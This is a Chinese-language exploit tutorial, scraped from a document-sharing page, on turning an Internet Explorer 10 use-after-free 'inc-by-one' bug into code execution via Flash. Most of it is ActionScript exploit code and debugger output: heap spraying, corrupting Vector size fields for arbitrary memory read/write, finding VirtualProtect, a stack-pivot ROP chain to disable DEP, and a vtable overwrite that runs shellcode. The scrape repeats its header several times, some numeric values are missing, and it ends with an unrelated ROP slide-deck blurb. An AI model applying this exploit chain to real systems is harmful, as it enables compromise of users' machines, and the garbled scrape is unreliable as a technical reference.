inc-by-one 之高级漏洞利用技术 By Netfairy 前言什么是 inc-by-one? 比如有这样的一条指令 :inc dword ptr [eax+8], 这条指令执行的效果是使 eax+8 地址处的值加 1, 类似于 c 语言 (eax+8) = (eax+8) +1, 如

Size: px

Start display at page:

Download "inc-by-one 之高级漏洞利用技术 By Netfairy 前言什么是 inc-by-one? 比如有这样的一条指令 :inc dword ptr [eax+8], 这条指令执行的效果是使 eax+8 地址处的值加 1, 类似于 c 语言 *(eax+8) = *(eax+8) +1, 如"

祚万
4 years ago
Views:

inc-by-one 之高级漏洞利用技术 By Netfairy 前言什么是 inc-by-one? 比如有这样的一条指令 :inc dword ptr [eax+8], 这条指令执行的效果是使 eax+8 地址处的值加 1, 类似于 c 语言 *(eax+8) = *(eax+8) +1, 如果我们可以控制 eax 的值, 那么这就是一个 inc-by-one 漏洞利用方法 1.

1 inc-by-one 之高级漏洞利用技术 By Netfairy 前言什么是 inc-by-one? 比如有这样的一条指令 :inc dword ptr [eax+8], 这条指令执行的效果是使 eax+8 地址处的值加 1, 类似于 c 语言 *(eax+8) = *(eax+8) +1, 如果我们可以控制 eax 的值, 那么这就是一个 inc-by-one 漏洞利用方法 1. 布置堆内存这里我以 CVE 为例子介绍, 网上已有相关的漏洞原理介绍, 本文介绍这种类型的漏洞利用方法, 这是一个存在于 ie10 的 uaf 漏洞, 尽管这个漏洞本身存在于 IE 里面, 但是为了实现成功利用, 借用了 flash 作为辅助, 来突破各种防护打开 poc, 结果如下要利用这个漏洞, 首先我们利用 ActionScript 在堆上分配大量的 Vector.<uint>, 长度是 0x3fe, 因为每个 Vector.<uint> 有 8 字节 BlockHeader, 其中前 4 个字节是 size 字段 0x3fe*4+8=0x1000, 所以每个 Vector.<uint> 之间紧邻, 不会留下空隙 this.s = new Vector.<Object>(0x10000); while ( len < 0x10000 ) this.s[len] = new Vector.<uint>(0x1000 / 4-2); //0x3fe for (i=0; i < this.s[len].length; i++) this.s[len][i] = 0x1a1a1a1a; ++len; HeapSpray 之后内存分布图

2 0x1a1b2000 是其中一个 Vector.<uint>, 我把它命名为 v1,0x1a1b3000 为 v2, 以此类推 0x3fe 是 Vector.<uint> 的大小 2. 触发 inc-by-one 漏洞, 修改 size, 读写整个地址空间通过 ie 的触发 uaf 漏洞, 重新分配内存占据已经被释放的对象, 我们可以控制 inc-by-one 的目标地址, 本文我们对 0x1a1b2000 处的 v1 的 size 字段加 1, 结果如下 V1 的 size 被修改为 0x3ff 后, 那么通过 v1 可以往后多访问四个字节 (uint), 刚好能访问到 v2 的 size 字段, 也就是说 v2 的 size 字段可以被 v1 访问并修改, 那么, 如果我们把 v2 的 size 字段修改为一个很大的值, 通过 v2, 我们就能读写整个进程地址空间 while (v1 < 0x10000) try if (this.s[v1].length == 0x3ff) //v1 本来 0x3fe, 漏洞触发后 v1 的 size 被修改为 0x3ff this.s[v1][0x3fe] = 0x3fffffff; // 修改 v2 的 size 为 0x3fffffff

3 ; catch(e:error) ; v1 = (v1 + 1); 3. 喷射 sound 对象, 便于后面的利用因为 flash 是高级语言, 我们无法直接操作内存, 不能直接控制 eip 指向, 但是高级语言的对象有一个虚表的东西, 里面保存着虚函数的地址如果我们能修改虚表指针指向另外一块可控内存, 在这块内存写入我们 shellcode 的地址, 一旦我们调用虚函数, 实际上就会调用我们的 shellcode 为此我们用下面的代码布局 sound 对象 this.sound = new Sound(); this.spraysound = new Vector.<Object>(0x100); len = 0; while (len < 0x100) this.spraysound[len] = new Vector.<Object>(0x1234); for (i=0; i < this.spraysound[len].length; i++) this.spraysound[len][i] = this.sound; ++len; 喷射结果如下 f f f !0."!0."!0." 22f f f f !0."!0."!0." 22f f f f !0."!0."!0." 22f1d f f f !0."!0."!0." 22f f f f !0."!0."!0." 22f f f f !0."!0."!0." 实际上,22f03021 是 sound 对象地址加 1, 通过修改 sound 对象的虚表指针, 一旦我们调用 test 函数, 实际上执行的是 shellcode

4. 信息搜集前面我们通过 v2 得到任意内存读写, 在覆盖虚表指针, 调用虚函数执行 shellcode 之前, 还需要解决

首先需要找到这个函数的地址 VirtualProtect 由 kernel32.

dll, 搜索 IAT 即可定位 VirtualProtect 那么, 首先要得到 flash 模块导入表的地址, 那么我们得先知道

4 4. 信息搜集前面我们通过 v2 得到任意内存读写, 在覆盖虚表指针, 调用虚函数执行 shellcode 之前, 还需要解决 DEP 保护现在 ie 都启用了 DEP 保护要关闭 DEP, 可以用 VirtualProtect 那么, 首先需要找到这个函数的地址 VirtualProtect 由 kernel32.dll 导出, 正好,flash 模块的导入表有 kernel32.dll, 搜索 IAT 即可定位 VirtualProtect 那么, 首先要得到 flash 模块导入表的地址, 那么我们得先知道 flash 模块的基址这里我们我们通过 flash 的一个虚表指针往回暴力搜索 pe 头定位 flash 基址而通过 v2 我们可以定位到一个虚表指针, 总的来说, 这个过程如下 Stack_pivot(xchg eax,esp;retn) 后面我们会看到它的作用首先搜索 v2 v2 = 0;

5 for (v2=0; v2 < this.s.length; v2++) if (this.s[v2].length == 0x3FFFFFFF) //v2 的 size 为 0x3ffffff 然后搜索一个 flash 虚表指针 j=0; while(i<this.s[v2].length) if (this.s[v2][j] == 0x00010c00) if(this.s[v2][j+0x9] == 0x ) soundindex = j; vtable = this.s[v2][j+0x8]; j++; 这里有必要解释一下, 前面我们喷射了 sound 对象, 在 x24 内存如下 c fe0 0fdf3000 0fde f c0d2d f f f f f f f f f f f f f f03021 Sound 对象 (22f03021) 前面是 0x , 再前面的 0x61c0d2d4 是 flash 一个虚表指针, 虚表指针前面有一个标志, 就是 0x00010c00 通过这个 flash 虚表指针, 暴力搜索 flash 基址 temp=vtable & 0xffff0000; while(1) if (this.s[v2][(temp-0x1a1b3000)/4-2] == 0x00905A4D) //-2 因为 8 个字节的 Blockheader baseflashaddr = temp; temp=temp-0x1000; 得到 flash 基址后, 搜索 VirtualProtect 和 stack_privot 地址 // 获取导入表

6 peindex = this.s[v2][(baseflashaddr+0x3c-0x1a1b3000)/4-2]; importsindex = this.s[v2][(baseflashaddr+peindex+0x80-0x1a1b3000)/4-2]; // 得到 VirtualProtect 地址 vp_addr = getvpaddr(); // 搜索 stack_pivot 地址 i=0; while(1) stackpivot = baseflashaddr+0x8a000+i; // 从偏移 0x8a000 开始搜索 try if ( (readint(stackpivot)&0x0000ffff) == 0xC394 ) catch(e:error) ; i++; 5. 布置 shellcode 通过 v2, 把以上获取到的信息写入某个地址首先写入 stack_privot, 执行后 esp 指向可控内存然后写入 VirtualProtect 地址和它的参数, 执行后关闭 DEP 最后面写入 shellcode, DEP 关闭后转入 shellcode 执行 // 第一阶段 shellcode:rop writeint(0x1a1b3078,stackpivot); this.s[v2][0] =vp_addr //VirtualProtect 地址 this.s[v2][1] =0x1a1b4008 // 设置为 shellcodee 的地址就可以了 this.s[v2][2] =0x1a1b4008 // 参数一 :shellcode 所在内存空间起始地址 this.s[v2][3] =0x4000 // 参数二 :shellcode 大小 this.s[v2][4] =0x40 // 参数三 :0x40 this.s[v2][5] =0x1a1b2008; // 参数四 : 某个可写地址 // 第二阶段 shellcode: 任意代码 writeint(0x1a1b4008,0x0089e8fc); writeint(0x1a1b400c,0x ); writeint(0x1a1b4010,0x64d231e5); 6. 修改 sound 对象虚表指针

var dec:uint = 0; var soundobjref:uint = 0; while (1) soundobjref = this.s[v2][soundindex+0x0a]; //VA:sound 对象的地址 +1 if(writeint(soundobjref-1,0x1a1b3008) == 1) // 修改虚表指针为 0x1a1b3008 else flash.

7 var dec:uint = 0; var soundobjref:uint = 0; while (1) soundobjref = this.s[v2][soundindex+0x0a]; //VA:sound 对象的地址 +1 if(writeint(soundobjref-1,0x1a1b3008) == 1) // 修改虚表指针为 0x1a1b3008 else flash.external.externalinterface.call('alert',"write vtable pointer failed and exploit falied..."); 前面我们把 shellcode 布置在 0x1a1b3078, 这里为什么把虚表指针修改为 0x1a1b3008 呢? 大家看实际上是 call [eax+0x70],eax 就是虚表指针 7. 调用虚函数, 执行 shellcode this.sound.tostring(); 动态调试为了模拟真实的攻击情景, 搭建 web 服务器用 windbg 附加 ie, 在 Flash32_17_0_0_134!IAEModule_IAEKernel_UnloadModule+0xdfaa2( 是具体情况而定 ) 下断点访问 html 文件

8 中断调试器, 查看此时的 v1, 也就是 0x1a1b2000 这是未触发漏洞前 v1 的 size, 为 0x3fe 继续运行 ExternalInterface.call("exevl"); 调用 html 文件里的 exevl 函数, 此函数触发 uaf 漏洞 exevl 函数执行完返回 flash 后, 再看此时的 v1,size 字段成功被加 1 继续运行, 通过 v1 修改 v2 的 size 字段 this.s[v1][0x3fe] = 0x3fffffff; // 修改 v2'size 为 0x3fffffff

9 中断调试器, 此时的 v2 的 size 字段已经被修改为 0x3fffffff, 这意味着我们可以访问很大一块内存地址空间继续运行中断调试器, 用 s -d 0x0 l?0x7fffffff 0x 搜索喷射的 sound 对象, 前面有一些并不是, 后面会比较连续的出现 sound 对象引用

10 下面的道理一样, 我就不逐一截图了最后来到这里 flash.external.externalinterface.call('alert',"start to run calc?"); 点击确定之后会调用 sound 对象的虚函数 // 调用虚函数, 触发 shellcode this.sound.tostring(); widbg 中断从图中可以看到, 程序会跳转到 0x6257adf8 地址执行, 这个地址是 6257adf8 94 xchg eax,esp 6257adf9 c3 ret

执行 xchg eax,sp 后,esp=0x1a1b30008 我们看下 0x1a1b3008 处 0:016> dd 0x1a1b3008 1a1b3008 774e2c15 1a1b4008 1a1b4008 00004000 1a1b3018 00000040 1a1b2008 1a1a1a1a 1a1a1a1a 1a1b3028 1a1a1a1a 1a1a1a1a 1a1a1a1a

11 执行 xchg eax,sp 后,esp=0x1a1b30008 我们看下 0x1a1b3008 处 0:016> dd 0x1a1b3008 1a1b e2c15 1a1b4008 1a1b a1b a1b2008 1a1a1a1a 1a1a1a1a 1a1b3028 1a1a1a1a 1a1a1a1a 1a1a1a1a 1a1a1a1a 然后 retn 相当于 jmp 0x774e2c15, 即调用 VirtualProtect kernel32!virtualprotect: 774e2c15 8bff mov edi,edi 774e2c17 55 push ebp 774e2c18 8bec mov ebp,esp 774e2c1a 5d pop ebp 774e2c1b e9b8f4fbff jmp kernel32!createprocessa+0x56 (774a20d8) 774e2c20 90 nop 0x774e2c15 后 1a1b4008 是 VirtualProtect 的返回地址, 其实就是 shellcode 的地址 VirtualProtect 完成设置 shellcode 所在内存为可执行,VirtualProtect 返回之后调用 shellcode 完成漏洞利用

12 参考 CVE day Exploit 分析 : %88%86%E6%9E%90+%E6%9E%90 Flash Vector 漏洞利用的蜕变 :

ROP_bamboofox.key

ROP_bamboofox.key ROP Return Oriented Programming Lays @ BambooFox Who Am I Lays / L4ys / 累死 - l4ys.tw Reverse Engineering BambooFox / HITCON Outline Buffer Overflow ret2libc / ret2text Return Oriented Programming Payload

inc-by-one 之高级漏洞利用技术 By Netfairy 前言 什么是 inc-by-one? 比如有这样的一条指令 :inc dword ptr [eax+8], 这条指令执行的效果是 使 eax+8 地址处的值加 1, 类似于 c 语言 *(eax+8) = *(eax+8) +1, 如

inc-by-one 之高级漏洞利用技术 By Netfairy 前言什么是 inc-by-one? 比如有这样的一条指令 :inc dword ptr [eax+8], 这条指令执行的效果是使 eax+8 地址处的值加 1, 类似于 c 语言 (eax+8) = (eax+8) +1, 如